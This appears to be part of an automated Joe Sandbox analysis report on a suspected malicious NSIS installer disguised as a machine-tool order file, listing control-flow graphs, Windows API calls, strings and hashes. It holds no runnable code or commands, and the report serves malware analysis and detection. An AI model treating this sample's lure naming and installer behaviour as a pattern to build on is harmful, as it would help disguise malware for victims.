                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 130 405054-405070 131 405076-40513d GetDlgItem * 3 call 403f17 call 4047b4 GetClientRect GetSystemMetrics SendMessageA * 2 130->131 132 4051ff-405205 130->132 154 40515b-40515e 131->154 155 40513f-405159 SendMessageA * 2 131->155 134 405207-405229 GetDlgItem CreateThread CloseHandle 132->134 135 40522f-40523b 132->135 134->135 137 40525d-405263 135->137 138 40523d-405243 135->138 142 405265-40526b 137->142 143 4052b8-4052bb 137->143 140 405245-405258 ShowWindow * 2 call 403f17 138->140 141 40527e-405285 call 403f49 138->141 140->137 151 40528a-40528e 141->151 144 405291-4052a1 ShowWindow 142->144 145 40526d-405279 call 403ebb 142->145 143->141 148 4052bd-4052c3 143->148 152 4052b1-4052b3 call 403ebb 144->152 153 4052a3-4052ac call 404f16 144->153 145->141 148->141 156 4052c5-4052d8 SendMessageA 148->156 152->143 153->152 159 405160-40516c SendMessageA 154->159 160 40516e-405185 call 403ee2 154->160 155->154 161 4053d5-4053d7 156->161 162 4052de-40530a CreatePopupMenu call 405d1f AppendMenuA 156->162 159->160 169 405187-40519b ShowWindow 160->169 170 4051bb-4051dc GetDlgItem SendMessageA 160->170 161->151 167 40530c-40531c GetWindowRect 162->167 168 40531f-405335 TrackPopupMenu 162->168 167->168 168->161 171 40533b-405355 168->171 172 4051aa 169->172 173 40519d-4051a8 ShowWindow 169->173 170->161 174 4051e2-4051fa SendMessageA * 2 170->174 175 40535a-405375 SendMessageA 171->175 176 4051b0-4051b6 call 403f17 172->176 173->176 174->161 175->175 177 405377-405397 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 175->177 176->170 179 405399-4053b9 SendMessageA 177->179 179->179 180 4053bb-4053cf GlobalUnlock SetClipboardData CloseClipboard 179->180 180->161
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004050B3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050C2
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004050FF
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405106
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405127
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405138
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040514B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405159
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040516C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518E
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004051A2
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051C3
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051D3
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051EC
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F8
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004050D1
                                                                                                                                                                                                                            • Part of subcall function 00403F17: SendMessageA.USER32(00000028,?,?,00403D48), ref: 00403F25
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405214
                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00004FE8,00000000), ref: 00405222
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405229
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040524C
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405253
                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405299
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052CD
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004052DE
                                                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004052F3
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405313
                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040532C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405368
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405378
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040537E
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405387
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405391
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A5
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053BE
                                                                                                                                                                                                                          • SetClipboardData.USER32(?,00000000), ref: 004053C9
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004053CF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID: Hil Setup: Installing$LN
                                                                                                                                                                                                                          • API String ID: 590372296-1526829629
                                                                                                                                                                                                                          • Opcode ID: ad5356adce3bb94830d25055b8f3bb936a018a1acfa821f759bd6897c2926a05
                                                                                                                                                                                                                          • Instruction ID: a6ff68720be7f0e5d6bf60450920f0594ccff0b83ae89a6b9846e031650dbd60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad5356adce3bb94830d25055b8f3bb936a018a1acfa821f759bd6897c2926a05
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31A16B71900209BFDB119FA0DD89AAE7B79FB08354F10407AFA01B62A0C7B55E419F69
                                                                                                                                                                                                                          Function 00405D1F Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 425 405d1f-405d2a 426 405d2c-405d3b 425->426 427 405d3d-405d52 425->427 426->427 428 405f45-405f49 427->428 429 405d58-405d63 427->429 430 405d75-405d7f 428->430 431 405f4f-405f59 428->431 429->428 432 405d69-405d70 429->432 430->431 435 405d85-405d8c 430->435 433 405f64-405f65 431->433 434 405f5b-405f5f call 405cfd 431->434 432->428 434->433 437 405d92-405dc7 435->437 438 405f38 435->438 439 405ee2-405ee5 437->439 440 405dcd-405dd8 GetVersion 437->440 441 405f42-405f44 438->441 442 405f3a-405f40 438->442 445 405f15-405f18 439->445 446 405ee7-405eea 439->446 443 405df2 440->443 444 405dda-405dde 440->444 441->428 442->428 450 405df9-405e00 443->450 444->443 447 405de0-405de4 444->447 451 405f26-405f36 lstrlenA 445->451 452 405f1a-405f21 call 405d1f 445->452 448 405efa-405f06 call 405cfd 446->448 449 405eec-405ef8 call 405c5b 446->449 447->443 453 405de6-405dea 447->453 463 405f0b-405f11 448->463 449->463 455 405e02-405e04 450->455 456 405e05-405e07 450->456 451->428 452->451 453->443 459 405dec-405df0 453->459 455->456 461 405e40-405e43 456->461 462 405e09-405e2c call 405be4 456->462 459->450 466 405e53-405e56 461->466 467 405e45-405e51 GetSystemDirectoryA 461->467 474 405e32-405e3b call 405d1f 462->474 475 405ec9-405ecd 462->475 463->451 465 405f13 463->465 472 405eda-405ee0 call 405f68 465->472 469 405ec0-405ec2 466->469 470 405e58-405e66 GetWindowsDirectoryA 466->470 468 405ec4-405ec7 467->468 468->472 468->475 469->468 473 405e68-405e72 469->473 470->469 472->451 478 405e74-405e77 473->478 479 405e8c-405ea2 SHGetSpecialFolderLocation 473->479 474->468 475->472 481 405ecf-405ed5 lstrcatA 475->481 478->479 482 405e79-405e80 478->482 483 405ea4-405ebb SHGetPathFromIDListA CoTaskMemFree 479->483 484 405ebd 479->484 481->472 486 405e88-405e8a 482->486 483->468 483->484 484->469 486->468 486->479
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,00404F4E,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000), ref: 00405DD0
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E4B
                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E5E
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0040E8D8), ref: 00405E9A
                                                                                                                                                                                                                          • SHGetPathFromIDListA.SHELL32(0040E8D8,Call), ref: 00405EA8
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(0040E8D8), ref: 00405EB3
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED5
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,00404F4E,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000), ref: 00405F27
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          • API String ID: 900638850-734914626
                                                                                                                                                                                                                          • Opcode ID: 72fca3c0d226cb4ffd2584a1df3709eed3dbe51e320ebdd5a95bbc0a956f9115
                                                                                                                                                                                                                          • Instruction ID: 0882c4b3dedd804cc86cf07441b0505b0d3b9fa6fe4ef2b0f086a7f01eec187c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72fca3c0d226cb4ffd2584a1df3709eed3dbe51e320ebdd5a95bbc0a956f9115
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D261F171A04A02ABDF209F24CC8877B3BA4EB55315F14813BE941BA2D0D27D4A42DF9E
                                                                                                                                                                                                                          Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                                                                                                          • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                                                                          • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                                                                                                                                          Function 0040559F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 687 40559f-4055c5 call 40585d 690 4055c7-4055d9 DeleteFileA 687->690 691 4055de-4055e5 687->691 692 405768-40576c 690->692 693 4055e7-4055e9 691->693 694 4055f8-405608 call 405cfd 691->694 696 405716-40571b 693->696 697 4055ef-4055f2 693->697 700 405617-405618 call 4057b6 694->700 701 40560a-405615 lstrcatA 694->701 696->692 699 40571d-405720 696->699 697->694 697->696 702 405722-405728 699->702 703 40572a-405732 call 406001 699->703 704 40561d-405620 700->704 701->704 702->692 703->692 710 405734-405748 call 40576f call 405557 703->710 707 405622-405629 704->707 708 40562b-405631 lstrcatA 704->708 707->708 711 405636-405654 lstrlenA FindFirstFileA 707->711 708->711 725 405760-405763 call 404f16 710->725 726 40574a-40574d 710->726 713 40565a-405671 call 40579a 711->713 714 40570c-405710 711->714 721 405673-405677 713->721 722 40567c-40567f 713->722 714->696 716 405712 714->716 716->696 721->722 727 405679 721->727 723 405681-405686 722->723 724 405692-4056a0 call 405cfd 722->724 728 405688-40568a 723->728 729 4056eb-4056fd FindNextFileA 723->729 737 4056a2-4056aa 724->737 738 4056b7-4056c2 call 405557 724->738 725->692 726->702 731 40574f-40575e call 404f16 call 405bb8 726->731 727->722 728->724 733 40568c-405690 728->733 729->713 735 405703-405706 FindClose 729->735 731->692 733->724 733->729 735->714 737->729 740 4056ac-4056b5 call 40559f 737->740 747 4056e3-4056e6 call 404f16 738->747 748 4056c4-4056c7 738->748 740->729 747->729 750 4056c9-4056d9 call 404f16 call 405bb8 748->750 751 4056db-4056e1 748->751 750->729 751->729
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055C8
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00420D28,\*.*,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405610
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014,?,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405631
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405637
                                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(00420D28,?,?,?,00409014,?,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405648
                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F5
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405706
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055AC
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 0040559F
                                                                                                                                                                                                                          • (B, xrefs: 004055F8
                                                                                                                                                                                                                          • \*.*, xrefs: 0040560A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$(B$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                          • API String ID: 2035342205-233157525
                                                                                                                                                                                                                          • Opcode ID: a9cf0e0ea0975a8263e28babfe784fe6329d52fbb1a4df133ffe67e181d4691c
                                                                                                                                                                                                                          • Instruction ID: 8f0c06671bf428c0f48d088e48fc2575de732930cf6b83f410cedc31bee7f7b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9cf0e0ea0975a8263e28babfe784fe6329d52fbb1a4df133ffe67e181d4691c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2051D330800A04BADB21AB618D45BBF7BB8DF82714F54457BF445721D2C73C4982DE6E
                                                                                                                                                                                                                          Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 756 401751-401774 call 402a3a call 4057dc 761 401776-40177c call 405cfd 756->761 762 40177e-401790 call 405cfd call 40576f lstrcatA 756->762 767 401795-40179b call 405f68 761->767 762->767 772 4017a0-4017a4 767->772 773 4017a6-4017b0 call 406001 772->773 774 4017d7-4017da 772->774 782 4017c2-4017d4 773->782 783 4017b2-4017c0 CompareFileTime 773->783 775 4017e2-4017fe call 405970 774->775 776 4017dc-4017dd call 40594b 774->776 784 401800-401803 775->784 785 401876-40189f call 404f16 call 402e9f 775->785 776->775 782->774 783->782 786 401805-401847 call 405cfd * 2 call 405d1f call 405cfd call 4054f3 784->786 787 401858-401862 call 404f16 784->787 797 4018a1-4018a5 785->797 798 4018a7-4018b3 SetFileTime 785->798 786->772 819 40184d-40184e 786->819 799 40186b-401871 787->799 797->798 801 4018b9-4018c4 CloseHandle 797->801 798->801 802 4028d8 799->802 804 4018ca-4018cd 801->804 805 4028cf-4028d2 801->805 806 4028da-4028de 802->806 808 4018e2-4018e5 call 405d1f 804->808 809 4018cf-4018e0 call 405d1f lstrcatA 804->809 805->802 816 4018ea-402273 call 4054f3 808->816 809->816 816->806 819->799 821 401850-401851 819->821 821->787
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                                                                            • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00402FCF,00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsz3421.tmp$C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll$C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs$Call
                                                                                                                                                                                                                          • API String ID: 1941528284-2685272807
                                                                                                                                                                                                                          • Opcode ID: 963d28357b86bea65fde7e92aeb9b0ad5042be29207f2c7533d20736e8562931
                                                                                                                                                                                                                          • Instruction ID: b3254d88aebf37d11d8c7362002191d58d549b74aa0b12ea023da1ca5ce0478c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 963d28357b86bea65fde7e92aeb9b0ad5042be29207f2c7533d20736e8562931
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F41C871A04515BADF107BB5CC45EAF3669DF41329F20823BF112F11E2DA3C4A419B6D
                                                                                                                                                                                                                          Function 00406344 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
